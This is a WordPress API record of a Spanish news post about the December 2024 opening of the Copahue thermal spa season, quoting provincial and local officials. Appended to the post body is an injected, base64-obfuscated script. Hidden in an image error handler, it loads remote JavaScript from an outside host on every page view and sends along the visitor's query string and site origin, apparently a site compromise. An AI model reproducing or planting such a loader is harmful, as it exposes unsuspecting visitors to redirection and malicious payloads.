{"id":9032,"date":"2024-12-10T10:01:45","date_gmt":"2024-12-10T13:01:45","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9032"},"modified":"2025-08-13T15:34:44","modified_gmt":"2025-08-13T18:34:44","slug":"el-pasado-1-de-diciembre-se-inauguro-la-temporada-termal-en-copahue","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9032","title":{"rendered":"El pasado 1\u00b0 de Diciembre, se inaugur\u00f3 la temporada termal en Copahue"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-69326c3fa892666347146496f88b5801\" style=\"background-color:#212f37\"><em>El ministro Gustavo Fern\u00e1ndez Capiet destac\u00f3 que desde el gobierno se trabaja para la \u201cmejora continua\u201d del complejo.<\/em><\/h3>\n\n\n\n<p>El reconocido complejo termal, ubicado al pie del volc\u00e1n Copahue, abri\u00f3 sus puertas con mejoras en accesibilidad y servicios, ofreciendo tratamientos \u00fanicos que combinan salud, bienestar y belleza en un entorno natural privilegiado.<\/p>\n\n\n\n<p>El acto de apertura de la nueva temporada en las Termas de Copahue reuni\u00f3 a autoridades provinciales, locales y trabajadores del sector, quienes destacaron los avances realizados y los desaf\u00edos para posicionar este destino \u00fanico en el mundo.<\/p>\n\n\n\n<p>El ministro de Turismo,\u00a0<strong>Gustavo Fern\u00e1ndez Capiet<\/strong>\u00a0subray\u00f3 la importancia del trabajo conjunto y el compromiso con el desarrollo del complejo.\u00a0<em>\u201cLogramos incorporar minibuses, camionetas y una nueva serpentina para el sistema termal, elementos clave para optimizar recursos y garantizar el funcionamiento. Esto refleja nuestra pol\u00edtica de mejora continua\u201d, expres\u00f3.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050.jpg\"><img decoding=\"async\" width=\"768\" height=\"512\" data-id=\"9034\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050.jpg\" alt=\"\" class=\"wp-image-9034\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752714_752841_5050-480x320.jpg 480w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050.jpg\"><img decoding=\"async\" width=\"768\" height=\"479\" data-id=\"9035\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050.jpg\" alt=\"\" class=\"wp-image-9035\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050-300x187.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050-696x434.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050-673x420.jpg 673w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050-320x200.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/f768x1-752713_752840_5050-480x299.jpg 480w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md.webp\"><img decoding=\"async\" width=\"992\" height=\"661\" data-id=\"9036\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md.webp\" alt=\"\" class=\"wp-image-9036\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md.webp 992w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/md-800x533.webp 800w\" sizes=\"(max-width: 992px) 100vw, 992px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Destac\u00f3 el reconocimiento de ONU Turismo, asegurando que \u201ceste premio no es solo un orgullo, sino una plataforma para atraer inversi\u00f3n y proyectar a Copahue internacionalmente\u201d.<\/p>\n\n\n\n<p>El presidente del Ente Provincial de Termas (Eproten),\u00a0<strong>Mat\u00edas Ramos<\/strong>\u00a0puso \u00e9nfasis en la accesibilidad y la importancia de sostener el complejo gracias al esfuerzo de sus trabajadores.\u00a0<em>\u201cEste a\u00f1o pudimos reparar un ascensor que durante a\u00f1os limit\u00f3 el acceso de personas. Ahora estamos trabajando para un Copahue accesible al 100%. Queremos que todos puedan disfrutar de este lugar m\u00e1gico\u201d, afirm\u00f3.<\/em><\/p>\n\n\n\n<p>Ramos tambi\u00e9n anticip\u00f3 obras fundamentales durante la temporada: \u201cNos veremos en obra porque el clima nos limita. Pero este esfuerzo permitir\u00e1 pensar en un Copahue operativo los 365 d\u00edas del a\u00f1o\u201d.<\/p>\n\n\n\n<p>Por su parte, el intendente de Caviahue-Copahue,\u00a0<strong>Oscar Mansegosa<\/strong>\u00a0destac\u00f3 la necesidad de planificaci\u00f3n e inversiones sostenidas para superar las limitaciones clim\u00e1ticas.\u00a0<em>\u201cEstamos convencidos de que Copahue puede funcionar todo el a\u00f1o. Las mejoras en infraestructura y los proyectos como el uso de la geotermia nos permitir\u00e1n extender la temporada y atraer m\u00e1s turismo\u201d, asegur\u00f3.<\/em><\/p>\n\n\n\n<p>Las autoridades coincidieron en que el potencial \u00fanico de Copahue, tanto por su ubicaci\u00f3n al pie de un volc\u00e1n activo como por la calidad de sus recursos termales, posiciona a la regi\u00f3n como l\u00edder en turismo de bienestar. \u201cEl desaf\u00edo es grande, pero contamos con el respaldo del gobierno provincial y la pasi\u00f3n de quienes trabajan aqu\u00ed\u201d, concluy\u00f3 Fern\u00e1ndez Capiet.<\/p>\n\n\n\n<p>La temporada 2024 promete consolidar a las Termas de Copahue como uno de los destinos m\u00e1s destacados de la regi\u00f3n, con la combinaci\u00f3n de naturaleza, salud e innovaci\u00f3n como ejes principales.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.neuquenalinstante.com.ar\/noticias\/2024\/12\/02\/112042-se-inauguro-la-temporada-termal-en-copahue\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"579\" height=\"120\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Captura-de-pantalla_10-12-2024_95833_www.neuquenalinstante.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-9033\" style=\"width:222px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Captura-de-pantalla_10-12-2024_95833_www.neuquenalinstante.com_.ar_.jpeg 579w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Captura-de-pantalla_10-12-2024_95833_www.neuquenalinstante.com_.ar_-300x62.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Captura-de-pantalla_10-12-2024_95833_www.neuquenalinstante.com_.ar_-320x66.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Captura-de-pantalla_10-12-2024_95833_www.neuquenalinstante.com_.ar_-480x99.jpeg 480w\" sizes=\"(max-width: 579px) 100vw, 579px\" \/><\/a><\/figure>\n\n\n\n<p><\/p>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El ministro Gustavo Fern\u00e1ndez Capiet destac\u00f3 que desde el gobierno se trabaja para la \u201cmejora continua\u201d del complejo. El reconocido complejo termal, ubicado al pie del volc\u00e1n Copahue, abri\u00f3 sus puertas con mejoras en accesibilidad y servicios, ofreciendo tratamientos \u00fanicos que combinan salud, bienestar y belleza en un entorno natural privilegiado. El acto de apertura [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9036,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-9032","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9032","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9032"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9032\/revisions"}],"predecessor-version":[{"id":10023,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9032\/revisions\/10023"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9036"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9032"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9032"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9032"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}